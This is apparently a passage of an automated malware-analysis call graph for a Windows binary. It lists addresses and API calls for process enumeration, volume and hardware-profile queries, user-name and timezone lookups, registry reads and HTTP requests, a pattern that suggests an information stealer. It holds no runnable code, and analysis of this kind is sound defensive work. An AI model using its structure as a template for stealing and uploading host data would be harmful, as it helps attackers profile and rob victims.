40445e 80969->80970 80971 4047e8 3 API calls 80970->80971 80972 404472 80971->80972 80973 4047e8 3 API calls 80972->80973 80974 404486 80973->80974 80975 4047e8 3 API calls 80974->80975 80976 4044a0 80975->80976 80977 4047e8 3 API calls 80976->80977 80978 4044b7 80977->80978 80979 4047e8 3 API calls 80978->80979 80980 4044cd 80979->80980 80981 4047e8 3 API calls 80980->80981 80982 4044e4 80981->80982 80983 4047e8 3 API calls 80982->80983 80984 4044fa 80983->80984 80985 4047e8 3 API calls 80984->80985 80986 404511 80985->80986 80987 4047e8 3 API calls 80986->80987 80988 404528 80987->80988 80989 4047e8 3 API calls 80988->80989 80990 40453e 80989->80990 80991 4047e8 3 API calls 80990->80991 80992 404558 80991->80992 80993 4047e8 3 API calls 80992->80993 80994 40456f 80993->80994 80995 4047e8 3 API calls 80994->80995 80996 404586 80995->80996 80997 4047e8 3 API calls 80996->80997 80998 40459d 80997->80998 80999 4047e8 3 API calls 80998->80999 81000 4045b4 80999->81000 81001 4047e8 3 API calls 81000->81001 81002 4045cb 81001->81002 81003 4047e8 3 API calls 81002->81003 81004 4045e2 81003->81004 81005 4047e8 3 API calls 81004->81005 81006 4045f9 81005->81006 81007 4047e8 3 API calls 81006->81007 81008 404612 81007->81008 81009 4047e8 3 API calls 81008->81009 81010 404629 81009->81010 81011 4047e8 3 API calls 81010->81011 81012 404642 81011->81012 81013 4047e8 3 API calls 81012->81013 81014 404656 81013->81014 81015 4047e8 3 API calls 81014->81015 81016 40466d 81015->81016 81017 4047e8 3 API calls 81016->81017 81018 404684 81017->81018 81019 4047e8 3 API calls 81018->81019 81020 40469b 81019->81020 81021 4047e8 3 API calls 81020->81021 81022 4046b2 81021->81022 81023 4047e8 3 API calls 81022->81023 81024 4046cc 81023->81024 81025 4047e8 3 API calls 81024->81025 81026 4046e3 81025->81026 81027 4047e8 3 API calls 81026->81027 81028 4046f9 81027->81028 81029 4047e8 3 API calls 81028->81029 81030 404710 81029->81030 81031 4047e8 3 API calls 81030->81031 81032 404727 81031->81032 81033 4047e8 3 API calls 81032->81033 81034 40473d 81033->81034 81035 4047e8 3 API calls 81034->81035 81036 404754 81035->81036 81037 4047e8 3 API calls 81036->81037 81038 404768 81037->81038 81039 4047e8 3 API calls 81038->81039 81040 404781 81039->81040 81041 4047e8 3 API calls 81040->81041 81042 404797 81041->81042 81043 4047e8 3 API calls 81042->81043 81044 4047ae 81043->81044 81045 4047e8 3 API calls 81044->81045 81046 4047c5 81045->81046 81047 4047e8 3 API calls 81046->81047 81048 4047dc 81047->81048 81048->80065 82368 42f109 81049->82368 81051 41258e CreateToolhelp32Snapshot Process32First 81052 4125c2 Process32Next 81051->81052 81053 4125ef CloseHandle 81051->81053 81052->81053 81054 4125d4 StrCmpCA 81052->81054 82369 42f165 81053->82369 81054->81052 81056 4125e6 81054->81056 81056->81052 81059 4104e7 lstrcpyA 81058->81059 81060 411c67 81059->81060 81061 4104e7 lstrcpyA 81060->81061 81062 411c75 GetSystemTime 81061->81062 81063 411c91 81062->81063 81064 41d016 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 81063->81064 81065 411cc8 81064->81065 81065->80072 81068 4105e1 81066->81068 81067 410605 81067->80087 81068->81067 81069 4105f3 lstrcpyA lstrcatA 81068->81069 81069->81067 81071 410519 lstrcpyA 81070->81071 81072 401d07 81071->81072 81073 410519 lstrcpyA 81072->81073 81074 401d12 81073->81074 81075 410519 lstrcpyA 81074->81075 81076 401d1d 81075->81076 81077 410519 lstrcpyA 81076->81077 81078 401d34 81077->81078 81079 4169b6 81078->81079 81080 410549 2 API calls 81079->81080 81081 4169ec 81080->81081 81082 410549 2 API calls 81081->81082 81083 4169f9 81082->81083 81084 410549 2 API calls 81083->81084 81085 416a06 81084->81085 81086 4104e7 lstrcpyA 81085->81086 81087 416a13 81086->81087 81088 4104e7 lstrcpyA 81087->81088 81089 416a20 81088->81089 81090 4104e7 lstrcpyA 81089->81090 81091 416a2d 81090->81091 81092 4104e7 lstrcpyA 81091->81092 81093 416a3a 81092->81093 81094 4104e7 lstrcpyA 81093->81094 81095 416a47 81094->81095 81096 4104e7 lstrcpyA 81095->81096 81105 416a54 81096->81105 81099 416a98 StrCmpCA 81100 416af1 StrCmpCA 81099->81100 81099->81105 81101 416cd4 81100->81101 81100->81105 81104 41058d lstrcpyA 81101->81104 81106 416cdf 81104->81106 81105->81099 81105->81100 81111 41683e 28 API calls 81105->81111 81112 4168c6 33 API calls 81105->81112 81115 416b51 StrCmpCA 81105->81115 81117 416baa StrCmpCA 81105->81117 81128 410519 lstrcpyA 81105->81128 81139 401cfd lstrcpyA 81105->81139 81152 41058d lstrcpyA 81105->81152 82372 4029f8 81105->82372 82375 402a09 81105->82375 82378 402a1a 81105->82378 82388 402a2b lstrcpyA 81105->82388 82389 402a3c lstrcpyA 81105->82389 82390 402a4d lstrcpyA 81105->82390 81108 4104e7 lstrcpyA 81106->81108 81109 416cec 81108->81109 81110 41058d lstrcpyA 81109->81110 81146 416c2c 81110->81146 81111->81105 81112->81105 81113 4104e7 lstrcpyA 81114 416d0b 81113->81114 81116 41058d lstrcpyA 81114->81116 81115->81105 81115->81117 81118 416d15 81116->81118 81119 416bc0 StrCmpCA 81117->81119 81120 416ca3 81117->81120 82381 416da2 81118->82381 81123 416c72 81119->81123 81124 416bd6 StrCmpCA 81119->81124 81122 41058d lstrcpyA 81120->81122 81125 416cae 81122->81125 81129 41058d lstrcpyA 81123->81129 81126 416be8 StrCmpCA 81124->81126 81127 416c3e 81124->81127 81132 4104e7 lstrcpyA 81125->81132 81133 416c0a 81126->81133 81134 416bfa Sleep 81126->81134 81131 41058d lstrcpyA 81127->81131 81128->81105 81135 416c7d 81129->81135 81136 416c49 81131->81136 81137 416cbb 81132->81137 81138 41058d lstrcpyA 81133->81138 81134->81105 81140 4104e7 lstrcpyA 81135->81140 81141 4104e7 lstrcpyA 81136->81141 81142 41058d lstrcpyA 81137->81142 81143 416c15 81138->81143 81139->81105 81144 416c8a 81140->81144 81145 416c56 81141->81145 81142->81146 81147 4104e7 lstrcpyA 81143->81147 81148 41058d lstrcpyA 81144->81148 81149 41058d lstrcpyA 81145->81149 81146->81113 81150 416c22 81147->81150 81148->81146 81149->81146 81151 41058d lstrcpyA 81150->81151 81151->81146 81152->81105 81153 416d28 81153->80098 81155 41058d lstrcpyA 81154->81155 81156 418257 81155->81156 81157 41058d lstrcpyA 81156->81157 81158 418262 81157->81158 81159 41058d lstrcpyA 81158->81159 81160 41826d 81159->81160 81160->80102 81162 410529 81161->81162 81163 41053e 81162->81163 81164 410536 lstrcpyA 81162->81164 81163->80115 81164->81163 81166 4109e6 GetVolumeInformationA 81165->81166 81167 4109df 81165->81167 81168 410a4d 81166->81168 81167->81166 81168->81168 81169 410a62 GetProcessHeap HeapAlloc 81168->81169 81170 410a7d 81169->81170 81171 410a8c wsprintfA lstrcatA 81169->81171 81172 4104e7 lstrcpyA 81170->81172 82391 411684 GetCurrentHwProfileA 81171->82391 81174 410a85 81172->81174 81178 41d016 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 81174->81178 81175 410ac7 lstrlenA 82407 4123d5 lstrcpyA malloc strncpy 81175->82407 81177 410aea lstrcatA 81180 410b01 81177->81180 81179 410b2e 81178->81179 81179->80142 81181 4104e7 lstrcpyA 81180->81181 81182 410b18 81181->81182 81182->81174 81184 410519 lstrcpyA 81183->81184 81185 404b59 81184->81185 82411 404ab6 81185->82411 81187 404b65 81188 4104e7 lstrcpyA 81187->81188 81189 404b81 81188->81189 81190 4104e7 lstrcpyA 81189->81190 81191 404b91 81190->81191 81192 4104e7 lstrcpyA 81191->81192 81193 404ba1 81192->81193 81194 4104e7 lstrcpyA 81193->81194 81195 404bb1 81194->81195 81196 4104e7 lstrcpyA 81195->81196 81197 404bc1 InternetOpenA StrCmpCA 81196->81197 81198 404bf5 81197->81198 81199 405194 InternetCloseHandle 81198->81199 81200 411c4a 7 API calls 81198->81200 81210 4051e1 81199->81210 81201 404c15 81200->81201 81202 4105c7 2 API calls 81201->81202 81203 404c28 81202->81203 81204 41058d lstrcpyA 81203->81204 81205 404c33 81204->81205 81206 410609 3 API calls 81205->81206 81207 404c5f 81206->81207 81208 41058d lstrcpyA 81207->81208 81209 404c6a 81208->81209 81212 410609 3 API calls 81209->81212 81211 41d016 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 81210->81211 81213 405235 81211->81213 81214 404c8b 81212->81214 81316 4139c2 StrCmpCA 81213->81316 81215 41058d lstrcpyA 81214->81215 81216 404c96 81215->81216 81217 4105c7 2 API calls 81216->81217 81218 404cb8 81217->81218 81219 41058d lstrcpyA 81218->81219 81220 404cc3 81219->81220 81221 410609 3 API calls 81220->81221 81222 404ce4 81221->81222 81223 41058d lstrcpyA 81222->81223 81224 404cef 81223->81224 81225 410609 3 API calls 81224->81225 81226 404d10 81225->81226 81227 41058d lstrcpyA 81226->81227 81228 404d1b 81227->81228 81229 410609 3 API calls 81228->81229 81230 404d3d 81229->81230 81231 4105c7 2 API calls 81230->81231 81232 404d48 81231->81232 81233 41058d lstrcpyA 81232->81233 81234 404d53 81233->81234 81235 404d69 InternetConnectA 81234->81235 81235->81199 81236 404d97 HttpOpenRequestA 81235->81236 81237 404dd7 81236->81237 81238 405188 InternetCloseHandle 81236->81238 81239 404dfb 81237->81239 81240 404ddf InternetSetOptionA 81237->81240 81238->81199 81241 410609 3 API calls 81239->81241 81240->81239 81242 404e11 81241->81242 81243 41058d lstrcpyA 81242->81243 81244 404e1c 81243->81244 81245 4105c7 2 API calls 81244->81245 81246 404e3e 81245->81246 81247 41058d lstrcpyA 81246->81247 81248 404e49 81247->81248 81249 410609 3 API calls 81248->81249 81250 404e6a 81249->81250 81251 41058d lstrcpyA 81250->81251 81252 404e75 81251->81252 81253 410609 3 API calls 81252->81253 81254 404e97 81253->81254 81255 41058d lstrcpyA 81254->81255 81256 404ea2 81255->81256 81257 410609 3 API calls 81256->81257 81258 404ec3 81257->81258 81259 41058d lstrcpyA 81258->81259 81260 404ece 81259->81260 81261 410609 3 API calls 81260->81261 81262 404eef 81261->81262 81263 41058d lstrcpyA 81262->81263 81264 404efa 81263->81264 81265 4105c7 2 API calls 81264->81265 81266 404f19 81265->81266 81267 41058d lstrcpyA 81266->81267 81268 404f24 81267->81268 81269 410609 3 API calls 81268->81269 81270 404f45 81269->81270 81271 41058d lstrcpyA 81270->81271 81272 404f50 81271->81272 81273 410609 3 API calls 81272->81273 81274 404f71 81273->81274 81275 41058d lstrcpyA 81274->81275 81276 404f7c 81275->81276 81277 4105c7 2 API calls 81276->81277 81278 404f9e 81277->81278 81279 41058d lstrcpyA 81278->81279 81280 404fa9 81279->81280 81281 410609 3 API calls 81280->81281 81282 404fca 81281->81282 81283 41058d lstrcpyA 81282->81283 81284 404fd5 81283->81284 81285 410609 3 API calls 81284->81285 81286 404ff7 81285->81286 81287 41058d lstrcpyA 81286->81287 81288 405002 81287->81288 81289 410609 3 API calls 81288->81289 81290 405023 81289->81290 81291 41058d lstrcpyA 81290->81291 81292 40502e 81291->81292 81293 410609 3 API calls 81292->81293 81294 40504f 81293->81294 81295 41058d lstrcpyA 81294->81295 81296 40505a 81295->81296 81297 4105c7 2 API calls 81296->81297 81298 405079 81297->81298 81299 41058d lstrcpyA 81298->81299 81300 405084 81299->81300 81301 4104e7 lstrcpyA 81300->81301 81302 40509f 81301->81302 81303 4105c7 2 API calls 81302->81303 81304 4050b6 81303->81304 81305 4105c7 2 API calls 81304->81305 81306 4050c7 81305->81306 81307 41058d lstrcpyA 81306->81307 81308 4050d2 81307->81308 81309 4050e8 lstrlenA lstrlenA HttpSendRequestA 81308->81309 81310 40515c InternetReadFile 81309->81310 81311 405176 InternetCloseHandle 81310->81311 81314 40511c 81310->81314 81312 402920 81311->81312 81312->81238 81313 410609 3 API calls 81313->81314 81314->81310 81314->81311 81314->81313 81315 41058d lstrcpyA 81314->81315 81315->81314 81317 4139e1 ExitProcess 81316->81317 81318 4139e8 strtok_s 81316->81318 81319 413b48 81318->81319 81332 413a04 81318->81332 81319->80150 81320 413b2a strtok_s 81320->81319 81320->81332 81321 413a21 StrCmpCA 81321->81320 81321->81332 81322 413a75 StrCmpCA 81322->81320 81322->81332 81323 413ab4 StrCmpCA 81323->81320 81323->81332 81324 413af4 StrCmpCA 81324->81320 81325 413b16 StrCmpCA 81325->81320 81326 413a59 StrCmpCA 81326->81320 81326->81332 81327 413ac9 StrCmpCA 81327->81320 81327->81332 81328 413a3d StrCmpCA 81328->81320 81328->81332 81329 413a9f StrCmpCA 81329->81320 81329->81332 81330 413ade StrCmpCA 81330->81320 81331 410549 2 API calls 81331->81332 81332->81320 81332->81321 81332->81322 81332->81323 81332->81324 81332->81325 81332->81326 81332->81327 81332->81328 81332->81329 81332->81330 81332->81331 81334 410519 lstrcpyA 81333->81334 81335 405f64 81334->81335 81336 404ab6 5 API calls 81335->81336 81337 405f70 81336->81337 81338 4104e7 lstrcpyA 81337->81338 81339 405f8c 81338->81339 81340 4104e7 lstrcpyA 81339->81340 81341 405f9c 81340->81341 81342 4104e7 lstrcpyA 81341->81342 81343 405fac 81342->81343 81344 4104e7 lstrcpyA 81343->81344 81345 405fbc 81344->81345 81346 4104e7 lstrcpyA 81345->81346 81347 405fcc InternetOpenA StrCmpCA 81346->81347 81348 406000 81347->81348 81349 4066ff InternetCloseHandle 81348->81349 81351 411c4a 7 API calls 81348->81351 82417 408048 CryptStringToBinaryA 81349->82417 81352 406020 81351->81352 81354 4105c7 2 API calls 81352->81354 81355 406033 81354->81355 81358 41058d lstrcpyA 81355->81358 81356 410549 2 API calls 81357 406739 81356->81357 81359 410609 3 API calls 81357->81359 81362 40603e 81358->81362 81360 406750 81359->81360 81361 41058d lstrcpyA 81360->81361 81367 40675b 81361->81367 81363 410609 3 API calls 81362->81363 81364 40606a 81363->81364 81365 41058d lstrcpyA 81364->81365 81366 406075 81365->81366 81370 410609 3 API calls 81366->81370 81368 41d016 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 81367->81368 81369 4067eb 81368->81369 81500 41343f strtok_s 81369->81500 81371 406096 81370->81371 81372 41058d lstrcpyA 81371->81372 81373 4060a1 81372->81373 81374 4105c7 2 API calls 81373->81374 81375 4060c3 81374->81375 81376 41058d lstrcpyA 81375->81376 81377 4060ce 81376->81377 81378 410609 3 API calls 81377->81378 81379 4060ef 81378->81379 81380 41058d lstrcpyA 81379->81380 81381 4060fa 81380->81381 81382 410609 3 API calls 81381->81382 81383 40611b 81382->81383 81384 41058d lstrcpyA 81383->81384 81385 406126 81384->81385 81386 410609 3 API calls 81385->81386 81387 406148 81386->81387 81388 4105c7 2 API calls 81387->81388 81389 406153 81388->81389 81390 41058d lstrcpyA 81389->81390 81391 40615e 81390->81391 81392 406174 InternetConnectA 81391->81392 81392->81349 81393 4061a2 HttpOpenRequestA 81392->81393 81394 4061e2 81393->81394 81395 4066f3 InternetCloseHandle 81393->81395 81396 406206 81394->81396 81397 4061ea InternetSetOptionA 81394->81397 81395->81349 81398 410609 3 API calls 81396->81398 81397->81396 81399 40621c 81398->81399 81400 41058d lstrcpyA 81399->81400 81401 406227 81400->81401 81402 4105c7 2 API calls 81401->81402 81403 406249 81402->81403 81404 41058d lstrcpyA 81403->81404 81405 406254 81404->81405 81406 410609 3 API calls 81405->81406 81407 406275 81406->81407 81408 41058d lstrcpyA 81407->81408 81409 406280 81408->81409 81410 410609 3 API calls 81409->81410 81411 4062a2 81410->81411 81412 41058d lstrcpyA 81411->81412 81413 4062ad 81412->81413 81414 410609 3 API calls 81413->81414 81415 4062cf 81414->81415 81416 41058d lstrcpyA 81415->81416 81417 4062da 81416->81417 81418 410609 3 API calls 81417->81418 81419 4062fb 81418->81419 81420 41058d lstrcpyA 81419->81420 81421 406306 81420->81421 81422 4105c7 2 API calls 81421->81422 81423 406325 81422->81423 81424 41058d lstrcpyA 81423->81424 81425 406330 81424->81425 81426 410609 3 API calls 81425->81426 81427 406351 81426->81427 81428 41058d lstrcpyA 81427->81428 81429 40635c 81428->81429 81430 410609 3 API calls 81429->81430 81431 40637d 81430->81431 81432 41058d lstrcpyA 81431->81432 81433 406388 81432->81433 81434 4105c7 2 API calls 81433->81434 81435 4063aa 81434->81435 81436 41058d lstrcpyA 81435->81436 81437 4063b5 81436->81437 81438 410609 3 API calls 81437->81438 81439 4063d6 81438->81439 81440 41058d lstrcpyA 81439->81440 81441 4063e1 81440->81441 81442 410609 3 API calls 81441->81442 81443 406403 81442->81443 81444 41058d lstrcpyA 81443->81444 81445 40640e 81444->81445 81446 410609 3 API calls 81445->81446 81447 40642f 81446->81447 81448 41058d lstrcpyA 81447->81448 81449 40643a 81448->81449 81450 410609 3 API calls 81449->81450 81451 40645b 81450->81451 81452 41058d lstrcpyA 81451->81452 81453 406466 81452->81453 81454 410609 3 API calls 81453->81454 81455 406487 81454->81455 81456 41058d lstrcpyA 81455->81456 81457 406492 81456->81457 81458 410609 3 API calls 81457->81458 81459 4064b3 81458->81459 81460 41058d lstrcpyA 81459->81460 81461 4064be 81460->81461 81462 410609 3 API calls 81461->81462 81463 4064df 81462->81463 81464 41058d lstrcpyA 81463->81464 81465 4064ea 81464->81465 81466 4105c7 2 API calls 81465->81466 81467 406506 81466->81467 81468 41058d lstrcpyA 81467->81468 81469 406511 81468->81469 81470 410609 3 API calls 81469->81470 81471 406532 81470->81471 81472 41058d lstrcpyA 81471->81472 81473 40653d 81472->81473 81474 410609 3 API calls 81473->81474 81475 40655f 81474->81475 81476 41058d lstrcpyA 81475->81476 81477 40656a 81476->81477 81478 410609 3 API calls 81477->81478 81479 40658b 81478->81479 81480 41058d lstrcpyA 81479->81480 81481 406596 81480->81481 81482 410609 3 API calls 81481->81482 81483 4065b7 81482->81483 81484 41058d lstrcpyA 81483->81484 81485 4065c2 81484->81485 81486 4105c7 2 API calls 81485->81486 81487 4065e1 81486->81487 81488 41058d lstrcpyA 81487->81488 81489 4065ec 81488->81489 81490 4065f7 lstrlenA lstrlenA GetProcessHeap HeapAlloc lstrlenA 81489->81490 82415 427050 81490->82415 81492 40663e lstrlenA lstrlenA 81493 427050 _memmove 81492->81493 81494 406667 lstrlenA HttpSendRequestA 81493->81494 81495 4066d2 InternetReadFile 81494->81495 81496 4066ec InternetCloseHandle 81495->81496 81498 406692 81495->81498 81496->81395 81497 410609 3 API calls 81497->81498 81498->81495 81498->81496 81498->81497 81499 41058d lstrcpyA 81498->81499 81499->81498 81501 4134cc 81500->81501 81503 41346e 81500->81503 81501->80165 81502 4134b6 strtok_s 81502->81501 81502->81503 81503->81502 81504 410549 2 API calls 81503->81504 81505 410549 2 API calls 81503->81505 81504->81502 81505->81503 81514 413286 81506->81514 81507 413385 81507->80178 81508 413332 StrCmpCA 81508->81514 81509 410549 2 API calls 81509->81514 81510 413367 strtok_s 81510->81514 81511 413301 StrCmpCA 81511->81514 81512 4132dc StrCmpCA 81512->81514 81513 4132ab StrCmpCA 81513->81514 81514->81507 81514->81508 81514->81509 81514->81510 81514->81511 81514->81512 81514->81513 81516 413434 81515->81516 81518 4133bc 81515->81518 81516->80191 81517 4133e2 StrCmpCA 81517->81518 81518->81517 81519 410549 2 API calls 81518->81519 81520 41341a strtok_s 81518->81520 81521 410549 2 API calls 81518->81521 81519->81520 81520->81516 81520->81518 81521->81518 81523 4104e7 lstrcpyA 81522->81523 81524 413b9f 81523->81524 81525 410609 3 API calls 81524->81525 81526 413baf 81525->81526 81527 41058d lstrcpyA 81526->81527 81528 413bb7 81527->81528 81529 410609 3 API calls 81528->81529 81530 413bcf 81529->81530 81531 41058d lstrcpyA 81530->81531 81532 413bd7 81531->81532 81533 410609 3 API calls 81532->81533 81534 413bef 81533->81534 81535 41058d lstrcpyA 81534->81535 81536 413bf7 81535->81536 81537 410609 3 API calls 81536->81537 81538 413c0f 81537->81538 81539 41058d lstrcpyA 81538->81539 81540 413c17 81539->81540 81541 410609 3 API calls 81540->81541 81542 413c2f 81541->81542 81543 41058d lstrcpyA 81542->81543 81544 413c37 81543->81544 82422 410cc0 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 81544->82422 81547 410609 3 API calls 81548 413c50 81547->81548 81549 41058d lstrcpyA 81548->81549 81550 413c58 81549->81550 81551 410609 3 API calls 81550->81551 81552 413c70 81551->81552 81553 41058d lstrcpyA 81552->81553 81554 413c78 81553->81554 81555 410609 3 API calls 81554->81555 81556 413c90 81555->81556 81557 41058d lstrcpyA 81556->81557 81558 413c98 81557->81558 82425 4115d4 81558->82425 81561 410609 3 API calls 81562 413cb1 81561->81562 81563 41058d lstrcpyA 81562->81563 81564 413cb9 81563->81564 81565 410609 3 API calls 81564->81565 81566 413cd1 81565->81566 81567 41058d lstrcpyA 81566->81567 81568 413cd9 81567->81568 81569 410609 3 API calls 81568->81569 81570 413cf1 81569->81570 81571 41058d lstrcpyA 81570->81571 81572 413cf9 81571->81572 81573 411684 11 API calls 81572->81573 81574 413d09 81573->81574 81575 4105c7 2 API calls 81574->81575 81576 413d16 81575->81576 81577 41058d lstrcpyA 81576->81577 81578 413d1e 81577->81578 81579 410609 3 API calls 81578->81579 81580 413d3e 81579->81580 81581 41058d lstrcpyA 81580->81581 81582 413d46 81581->81582 81583 410609 3 API calls 81582->81583 81584 413d5e 81583->81584 81585 41058d lstrcpyA 81584->81585 81586 413d66 81585->81586 81587 4109a2 19 API calls 81586->81587 81588 413d76 81587->81588 81589 4105c7 2 API calls 81588->81589 81590 413d83 81589->81590 81591 41058d lstrcpyA 81590->81591 81592 413d8b 81591->81592 81593 410609 3 API calls 81592->81593 81594 413dab 81593->81594 81595 41058d lstrcpyA 81594->81595 81596 413db3 81595->81596 81597 410609 3 API calls 81596->81597 81598 413dcb 81597->81598 81599 41058d lstrcpyA 81598->81599 81600 413dd3 81599->81600 81601 413ddb GetCurrentProcessId 81600->81601 82433 41224a OpenProcess 81601->82433 81604 4105c7 2 API calls 81605 413df8 81604->81605 81606 41058d lstrcpyA 81605->81606 81607 413e00 81606->81607 81608 410609 3 API calls 81607->81608 81609 413e20 81608->81609 81610 41058d lstrcpyA 81609->81610 81611 413e28 81610->81611 81612 410609 3 API calls 81611->81612 81613 413e40 81612->81613 81614 41058d lstrcpyA 81613->81614 81615 413e48 81614->81615 81616 410609 3 API calls 81615->81616 81617 413e60 81616->81617 81618 41058d lstrcpyA 81617->81618 81619 413e68 81618->81619 81620 410609 3 API calls 81619->81620 81621 413e80 81620->81621 81622 41058d lstrcpyA 81621->81622 81623 413e88 81622->81623 82440 410b30 GetProcessHeap HeapAlloc 81623->82440 81626 410609 3 API calls 81627 413ea1 81626->81627 81628 41058d lstrcpyA 81627->81628 81629 413ea9 81628->81629 81630 410609 3 API calls 81629->81630 81631 413ec1 81630->81631 81632 41058d lstrcpyA 81631->81632 81633 413ec9 81632->81633 81634 410609 3 API calls 81633->81634 81635 413ee1 81634->81635 81636 41058d lstrcpyA 81635->81636 81637 413ee9 81636->81637 82446 411807 81637->82446 81640 4105c7 2 API calls 81641 413f06 81640->81641 81642 41058d lstrcpyA 81641->81642 81643 413f0e 81642->81643 81644 410609 3 API calls 81643->81644 81645 413f2e 81644->81645 81646 41058d lstrcpyA 81645->81646 81647 413f36 81646->81647 81648 410609 3 API calls 81647->81648 81649 413f4e 81648->81649 81650 41058d lstrcpyA 81649->81650 81651 413f56 81650->81651 82463 411997 81651->82463 81653 413f67 81654 4105c7 2 API calls 81653->81654 81655 413f75 81654->81655 81656 41058d lstrcpyA 81655->81656 81657 413f7d 81656->81657 81658 410609 3 API calls 81657->81658 81659 413f9d 81658->81659 81660 41058d lstrcpyA 81659->81660 81661 413fa5 81660->81661 81662 410609 3 API calls 81661->81662 81663 413fbd 81662->81663 81664 41058d lstrcpyA 81663->81664 81665 413fc5 81664->81665 81666 410c85 3 API calls 81665->81666 81667 413fd2 81666->81667 81668 410609 3 API calls 81667->81668 81669 413fde 81668->81669 81670 41058d lstrcpyA 81669->81670 81671 413fe6 81670->81671 81672 410609 3 API calls 81671->81672 81673 413ffe 81672->81673 81674 41058d lstrcpyA 81673->81674 81675 414006 81674->81675 81676 410609 3 API calls 81675->81676 81677 41401e 81676->81677 81678 41058d lstrcpyA 81677->81678 81679 414026 81678->81679 82478 410c53 GetProcessHeap HeapAlloc GetUserNameA 81679->82478 81681 414033 81682 410609 3 API calls 81681->81682 81683 41403f 81682->81683 81684 41058d lstrcpyA 81683->81684 81685 414047 81684->81685 81686 410609 3 API calls 81685->81686 81687 41405f 81686->81687 81688 41058d lstrcpyA 81687->81688 81689 414067 81688->81689 81690 410609 3 API calls 81689->81690 81691 41407f 81690->81691 81692 41058d lstrcpyA 81691->81692 81693 414087 81692->81693 82479 411563 7 API calls 81693->82479 81696 4105c7 2 API calls 81697 4140a6 81696->81697 81698 41058d lstrcpyA 81697->81698 81699 4140ae 81698->81699 81700 410609 3 API calls 81699->81700 81701 4140ce 81700->81701 81702 41058d lstrcpyA 81701->81702 81703 4140d6 81702->81703 81704 410609 3 API calls 81703->81704 81705 4140ee 81704->81705 81706 41058d lstrcpyA 81705->81706 81707 4140f6 81706->81707 82482 410ddb 81707->82482 81710 4105c7 2 API calls 81711 414113 81710->81711 81712 41058d lstrcpyA 81711->81712 81713 41411b 81712->81713 81714 410609 3 API calls 81713->81714 81715 41413b 81714->81715 81716 41058d lstrcpyA 81715->81716 81717 414143 81716->81717 81718 410609 3 API calls 81717->81718 81719 41415b 81718->81719 81720 41058d lstrcpyA 81719->81720 81721 414163 81720->81721 81722 410cc0 9 API calls 81721->81722 81723 414170 81722->81723 81724 410609 3 API calls 81723->81724 81725 41417c 81724->81725 81726 41058d lstrcpyA 81725->81726 81727 414184 81726->81727 81728 410609 3 API calls 81727->81728 81729 41419c 81728->81729 81730 41058d lstrcpyA 81729->81730 81731 4141a4 81730->81731 81732 410609 3 API calls 81731->81732 81733 4141bc 81732->81733 81734 41058d lstrcpyA 81733->81734 81735 4141c4 81734->81735 82494 410d2e GetProcessHeap HeapAlloc GetTimeZoneInformation 81735->82494 81738 410609 3 API calls 81739 4141dd 81738->81739 81740 41058d lstrcpyA 81739->81740 81741 4141e5 81740->81741 81742 410609 3 API calls 81741->81742 81743 4141fd 81742->81743 81744 41058d lstrcpyA 81743->81744 81745 414205 81744->81745 81746 410609 3 API calls 81745->81746 81747 41421d 81746->81747 81748 41058d lstrcpyA 81747->81748 81749 414225 81748->81749 81750 410609 3 API calls 81749->81750 81751 41423d 81750->81751 81752 41058d lstrcpyA 81751->81752 81753 414245 81752->81753 82499 410f51 GetProcessHeap HeapAlloc RegOpenKeyExA 81753->82499 81756 410609 3 API calls 81757 41425e 81756->81757 81758 41058d lstrcpyA 81757->81758 81759 414266 81758->81759 81760 410609 3 API calls 81759->81760 81761 41427e 81760->81761 81762 41058d lstrcpyA 81761->81762 81763 414286 81762->81763 81764 410609 3 API calls 81763->81764 81765 41429e 81764->81765 81766 41058d lstrcpyA 81765->81766 81767 4142a6 81766->81767 82502 411007 81767->82502 81770 410609 3 API calls 81771 4142bf 81770->81771 81772 41058d lstrcpyA 81771->81772 81773 4142c7 81772->81773 81774 410609 3 API calls 81773->81774 81775 4142df 81774->81775 81776 41058d lstrcpyA 81775->81776 81777 4142e7 81776->81777 81778 410609 3 API calls 81777->81778 81779 4142ff 81778->81779 81780 41058d lstrcpyA 81779->81780 81781 414307 81780->81781 82519 410fba GetSystemInfo wsprintfA 81781->82519 81784 410609 3 API calls 81785 414320 81784->81785 81786 41058d lstrcpyA 81785->81786 81787 414328 81786->81787 81788 410609 3 API calls 81787->81788 81789 414340 81788->81789 81790 41058d lstrcpyA 81789->81790 81791 414348 81790->81791 81792 410609 3 API calls 81791->81792 81793 414360 81792->81793 81794 41058d lstrcpyA 81793->81794 81795 414368 81794->81795 82522 411119 GetProcessHeap HeapAlloc 81795->82522 81798 410609 3 API calls 81799 414381 81798->81799 81800 41058d lstrcpyA 81799->81800 81801 414389 81800->81801 81802 410609 3 API calls 81801->81802 81803 4143a4 81802->81803 81804 41058d lstrcpyA 81803->81804 81805 4143ac 81804->81805 81806 410609 3 API calls 81805->81806 81807 4143c7 81806->81807 81808 41058d lstrcpyA 81807->81808 81809 4143cf 81808->81809 82529 411192 81809->82529 81812 4105c7 2 API calls 81813 4143ef 81812->81813 81814 41058d lstrcpyA 81813->81814 81815 4143f7 81814->81815 81816 410609 3 API calls 81815->81816 81817 41441a 81816->81817 81818 41058d lstrcpyA 81817->81818 81819 414422 81818->81819 81820 410609 3 API calls 81819->81820 81821 41443a 81820->81821 81822 41058d lstrcpyA 81821->81822 81823 414442 81822->81823 82537 4114a5 81823->82537 81826 4105c7 2 API calls 81827 414462 81826->81827 81828 41058d lstrcpyA 81827->81828 81829 41446a 81828->81829 81830 410609 3 API calls 81829->81830 81831 414490 81830->81831 81832 41058d lstrcpyA 81831->81832 81833 414498 81832->81833 81834 410609 3 API calls 81833->81834 81835 4144b3 81834->81835 81836 41058d lstrcpyA 81835->81836 81837 4144bb 81836->81837 82547 411203 81837->82547 81840 4105c7 2 API calls 81841 4144e0 81840->81841 81842 41058d lstrcpyA 81841->81842 81843 4144e8 81842->81843 81844 411203 18 API calls 81843->81844 81845 414509 81844->81845 81846 4105c7 2 API calls 81845->81846 81847 414518 81846->81847 81848 41058d lstrcpyA 81847->81848 81849 414520 81848->81849 81850 410609 3 API calls 81849->81850 81851 414543 